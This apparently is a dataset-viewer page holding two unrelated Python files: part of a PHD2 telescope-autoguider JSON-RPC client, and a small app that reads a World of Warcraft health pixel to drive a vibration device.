if self.accum_active:
self.Stats = stats
elif e == "SettleBegin":
self.accum_active = (
False # exclude GuideStep messages from stats while settling
)
elif e == "Settling":
s = SettleProgress()
s.Done = False
s.Distance = ev["Distance"]
s.SettlePx = self.settle_px
s.Time = ev["Time"]
s.SettleTime = ev["SettleTime"]
s.Status = 0
with self.lock:
self.Settle = s
elif e == "SettleDone":
self.accum_active = True
self.accum_ra.Reset()
self.accum_dec.Reset()
stats = self._accum_get_stats(self.accum_ra, self.accum_dec)
s = SettleProgress()
s.Done = True
s.Status = ev["Status"]
s.Error = ev.get("Error")
with self.lock:
self.Settle = s
self.Stats = stats
elif e == "Paused":
with self.lock:
self.AppState = "Paused"
elif e == "StartCalibration":
with self.lock:
self.AppState = "Calibrating"
elif e == "LoopingExposures":
with self.lock:
self.AppState = "Looping"
elif e == "LoopingExposuresStopped" or e == "GuidingStopped":
with self.lock:
self.AppState = "Stopped"
elif e == "StarLost":
with self.lock:
self.AppState = "LostLock"
self.AvgDist = ev["AvgDist"]
else:
# print(f"DBG: todo: handle event {e}")
pass
def _worker(self):
while not self.terminate:
line = self.conn.ReadLine()
# print(f"DBG: L: {line}")
if not line:
if not self.terminate:
# server disconnected
# print("DBG: server disconnected")
pass
break
try:
j = json.loads(line)
except json.JSONDecodeError:
# ignore invalid json
# print("DBG: ignoring invalid json response")
continue
if "jsonrpc" in j:
# a response
# print(f"DBG: R: {line}\n")
with self.cond:
self.response = j
self.cond.notify()
else:
self._handle_event(j)
def Connect(self):
"""connect to PHD2 -- call Connect before calling any of the server API methods below"""
self.Disconnect()
try:
self.conn = _Conn()
self.conn.Connect(self.hostname, 4400 + self.instance - 1)
self.terminate = False
self.worker = threading.Thread(target=self._worker)
self.worker.start()
# print("DBG: connect done")
except Exception:
self.Disconnect()
raise
def Disconnect(self):
"""disconnect from PHD2"""
if self.worker is not None:
if self.worker.is_alive():
# print("DBG: terminating worker")
self.terminate = True
self.conn.Terminate()
# print("DBG: joining worker")
self.worker.join()
self.worker = None
if self.conn is not None:
self.conn.Disconnect()
self.conn = None
# print("DBG: disconnect done")
@staticmethod
def _make_jsonrpc(method, params):
req = {"method": method, "id": 1}
if params is not None:
if isinstance(params, (list, dict)):
req["params"] = params
else:
# single non-null parameter
req["params"] = [params]
return json.dumps(req, separators=(",", ":"))
@staticmethod
def _failed(res):
return "error" in res
def Call(self, method, params=None):
"""this function can be used for raw JSONRPC method
invocation. Generally you won't need to use this as it is much
more convenient to use the higher-level methods below
"""
s = self._make_jsonrpc(method, params)
# print(f"DBG: Call: {s}")
# send request
self.conn.WriteLine(s + "\r\n")
# wait for response
with self.cond:
while not self.response:
self.cond.wait()
response = self.response
self.response = None
if self._failed(response):
raise GuiderException(response["error"]["message"])
return response
def _CheckConnected(self):
if not self.conn.IsConnected():
raise GuiderException("PHD2 Server disconnected")
def Guide(self, settlePixels, settleTime, settleTimeout):
"""Start guiding with the given settling parameters. PHD2 takes care
of looping exposures, guide star selection, and settling. Call
CheckSettling() periodically to see when settling is complete.
"""
self._CheckConnected()
s = SettleProgress()
s.Done = False
s.Distance = 0
s.SettlePx = settlePixels
s.Time = 0
s.SettleTime = settleTime
s.Status = 0
with self.lock:
if self.Settle and not self.Settle.Done:
raise GuiderException("cannot guide while settling")
self.Settle = s
try:
self.Call(
"guide",
[
{
"pixels": settlePixels,
"time": settleTime,
"timeout": settleTimeout,
},
False, # don't force calibration
],
)
self.settle_px = settlePixels
except Exception:
with self.lock:
self.Settle = None
raise
def Dither(self, ditherPixels, settlePixels, settleTime, settleTimeout):
"""Dither guiding with the given dither amount and settling parameters. Call CheckSettling()
periodically to see when settling is complete.
"""
self._CheckConnected()
s = SettleProgress()
s.Done = False
s.Distance = ditherPixels
s.SettlePx = settlePixels
s.Time = 0
s.SettleTime = settleTime
s.Status = 0
with self.lock:
if self.Settle and not self.Settle.Done:
raise GuiderException("cannot dither while settling")
self.Settle = s
try:
self.Call(
"dither",
[
ditherPixels,
False,
{
"pixels": settlePixels,
"time": settleTime,
"timeout": settleTimeout,
},
],
)
self.settle_px = settlePixels
except Exception:
with self.lock:
self.Settle = None
raise
def IsSettling(self):
"""Check if phd2 is currently in the process of settling after a Guide
or Dither"""
self._CheckConnected()
with self.lock:
if self.Settle:
return True
# for app init, initialize the settle state to a consistent
# value as if Guide had been called
res = self.Call("get_settling")
val = res["result"]
if val:
s = SettleProgress()
s.Done = False
s.Distance = -1.0
s.SettlePx = 0.0
s.Time = 0.0
s.SettleTime = 0.0
s.Status = 0
with self.lock:
if self.Settle is None:
self.Settle = s
return val
def CheckSettling(self):
"""Get the progress of settling"""
self._CheckConnected()
ret = SettleProgress()
with self.lock:
if not self.Settle:
raise GuiderException("not settling")
if self.Settle.Done:
# settle is done
ret.Done = True
ret.Status = self.Settle.Status
ret.Error = self.Settle.Error
self.Settle = None
else:
# settle in progress
ret.Done = False
ret.Distance = self.Settle.Distance
ret.SettlePx = self.settle_px
ret.Time = self.Settle.Time
ret.SettleTime = self.Settle.SettleTime
return ret
def GetStats(self):
"""Get the guider statistics since guiding started. Frames captured
while settling is in progress are excluded from the stats.
"""
self._CheckConnected()
with self.lock:
stats = copy.copy(self.Stats)
stats.rms_tot = math.hypot(stats.rms_ra, stats.rms_dec)
return stats
def StopCapture(self, timeoutSeconds=10):
"""stop looping and guiding"""
self.Call("stop_capture")
for i in range(0, timeoutSeconds):
with self.lock:
if self.AppState == "Stopped":
return
time.sleep(1)
self._CheckConnected()
# hack! workaround bug where PHD2 sends a GuideStep after stop
# request and fails to send GuidingStopped
res = self.Call("get_app_state")
st = res["result"]
with self.lock:
self.AppState = st
if st == "Stopped":
return
# end workaround
raise GuiderException(
f"guider did not stop capture after {timeoutSeconds} seconds!"
)
def Loop(self, timeoutSeconds=10):
"""start looping exposures"""
self._CheckConnected()
# already looping?
with self.lock:
if self.AppState == "Looping":
return
res = self.Call("get_exposure")
exp = res["result"]
self.Call("loop")
time.sleep(exp)
for i in range(0, timeoutSeconds):
with self.lock:
if self.AppState == "Looping":
return
time.sleep(1)
self._CheckConnected()
raise GuiderException("timed-out waiting for guiding to start looping")
def PixelScale(self):
"""get the guider pixel scale in arc-seconds per pixel"""
res = self.Call("get_pixel_scale")
return res["result"]
def GetEquipmentProfiles(self):
"""get a list of the Equipment Profile names"""
res = self.Call("get_profiles")
profiles = []
for p in res["result"]:
profiles.append(p["name"])
return profiles
def ConnectEquipment(self, profileName):
"""connect the equipment in an equipment profile"""
res = self.Call("get_profile")
prof = res["result"]
if prof["name"] != profileName:
res = self.Call("get_profiles")
profiles = res["result"]
profid = -1
for p in profiles:
name = p["name"]
if name == profileName:
profid = p.get("id", -1)
break
if profid == -1:
raise GuiderException(f"invalid phd2 profile name: {profileName}")
self.StopCapture(self.DEFAULT_STOPCAPTURE_TIMEOUT)
self.Call("set_connected", False)
self.Call("set_profile", profid)
self.Call("set_connected", True)
def DisconnectEquipment(self):
"""disconnect equipment"""
self.StopCapture(self.DEFAULT_STOPCAPTURE_TIMEOUT)
self.Call("set_connected", False)
def GetStatus(self):
"""get the AppState
(https://github.com/OpenPHDGuiding/phd2/wiki/EventMonitoring#appstate)
and current guide error
"""
self._CheckConnected()
with self.lock:
return self.AppState, self.AvgDist
def IsGuiding(self):
"""check if currently guiding"""
st, dist = self.GetStatus()
return self._is_guiding(st)
def Pause(self):
"""pause guiding (looping exposures continues)"""
self.Call("set_paused", True)
def Unpause(self):
"""un-pause guiding"""
self.Call("set_paused", False)
def SaveImage(self, filename):
"""save the current guide camera frame (FITS format), returning the
name of the file in *filename. The caller will need to remove
the file when done.
"""
res = self.Call("save_image")
return res["result"]["filename"]
|
main_ui.py
|
import logging, sys, signal, time, json, os, pytweening, threading
from collections import deque
from lib.vhWindows import vhWindows
from lib.vhSockets import vhSockets
from lib.vhUI import vhUI
logging.basicConfig(stream=sys.stdout, level=logging.INFO)
#logger = logging.getLogger(__name__)
#logger.setLevel(logging.DEBUG)
class App:
colorBuffer = bytes([0])
# This moves
cacheHP = 0
conf = vhWindows()
sock = vhSockets()
ui = vhUI()
# Last loop tick
tickTime = time.time()
# Tween value being modified
tweenVal = 0
# Tween start value
tweenStart = 0
# Time tween was started
tweenStarted = 0
# Local duration in case we go over max
tweenDuration = 1
TWEEN_DURATION = 1
FRAMERATE = 4
# Time to run a save
saveScheduled = 0
def __init__(self):
signal.signal(signal.SIGINT, self.sigint_handler)
self.conf.onWowStatus = self.onWowRunning
self.conf.init()
self.ui.setDeviceId(self.conf.deviceID)
self.ui.setDeviceServer(self.conf.server)
self.ui.setIntensity(self.conf.maxIntensity)
self.ui.setRatio(self.conf.hpRatio)
self.ui.setMinIntensity(self.conf.minIntensity)
self.ui.setCursorCoordinates(self.conf.cursor["x"], self.conf.cursor["y"])
self.ui.onEvt = self.uiEvent
self.sock.onConnection = self.onConnection
self.sock.init(self.conf)
thrd = threading.Thread(target=self.loop)
thrd.daemon = True
thrd.start()
#start UI
self.ui.begin()
def uiEvent(self, t, data):
c = self.conf
if t == "settings":
c.deviceID = data[0]
c.server = data[1]
c.saveConfig()
self.sock.resetDevice()
elif t == "click":
c.cursor["x"] = data[0]
c.cursor["y"] = data[1]
c.saveConfig()
self.ui.setCursorCoordinates(self.conf.cursor["x"], self.conf.cursor["y"])
elif t == "intensity":
c.maxIntensity = data[0]
c.minIntensity = min(c.maxIntensity, c.minIntensity)
self.ui.setMinIntensity(c.minIntensity)
self.scheduleSave()
elif t == "minintensity":
c.minIntensity = data[0]
c.maxIntensity = max(c.maxIntensity, c.minIntensity)
self.ui.setIntensity(c.maxIntensity)
self.scheduleSave()
elif t == "ratio":
c.hpRatio = data[0]
self.scheduleSave()
elif t == "weakaura":
self.conf.copyWeakaura()
def onWowRunning(self, running):
self.ui.setWowRunning(running)
if not running:
self.sock.resetVib()
def onConnection(self, connected):
self.ui.setConnectionStatus(connected)
def scheduleSave(self):
self.saveScheduled = time.time()+0.2
def startTween(self, amount):
# Power at start of tween
self.tweenStart = self.tweenVal+amount
# Time at start of tween
self.tweenStarted = time.time()
# Power at tween start needs to be at least 15%
# Duration should be total intensity plus 0.2, but max 4
self.tweenDuration = min(0.2+self.tweenStart*2, 4)
# Intensity slides between min and max
intensity = min(max(
self.tweenStart*
(self.conf.maxIntensity-self.conf.minIntensity)+
self.conf.minIntensity, 0), self.conf.maxIntensity)
#print(amount, intensity, self.tweenDuration)
self.sock.sendProgram(intensity, self.tweenDuration)
# Sigint handling
def sigint_handler(self, signal, frame):
print ('Interrupted')
os._exit(1)
# Threading
def createThread(func, autostart = True):
thrd = threading.Thread(target=func)
thrd.daemon = True
if autostart:
thrd.start()
return thrd
def loop(self):
while True:
t = time.time()
passed = t-self.tickTime
self.tickTime = t
conf = self.conf
conf.processScan() # See if WoW is running or not
if self.saveScheduled:
self.saveScheduled = 0
self.conf.saveConfig()
if self.sock.connected and self.conf.wowPid:
color = conf.updatePixelColor()
if conf.g == 51:
index = 0
hpp = conf.r/255
if hpp < self.cacheHP:
self.startTween((self.cacheHP-hpp)*self.conf.hpRatio)
self.cacheHP = hpp
if self.tweenStarted:
tweenPerc = 1-(t-self.tweenStarted)/self.tweenDuration;
if tweenPerc < 0:
tweenPerc = 0
self.tweenStarted = 0
elif tweenPerc > 1:
tweenPerc = 1
self.tweenVal = pytweening.linear(tweenPerc)*self.tweenStart
if not self.conf.wowPid:
time.sleep(1)
else:
after = time.time()
logicTime = 1/self.FRAMERATE-(after-t)
if logicTime > 0:
time.sleep(logicTime)
#Begin
App()
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.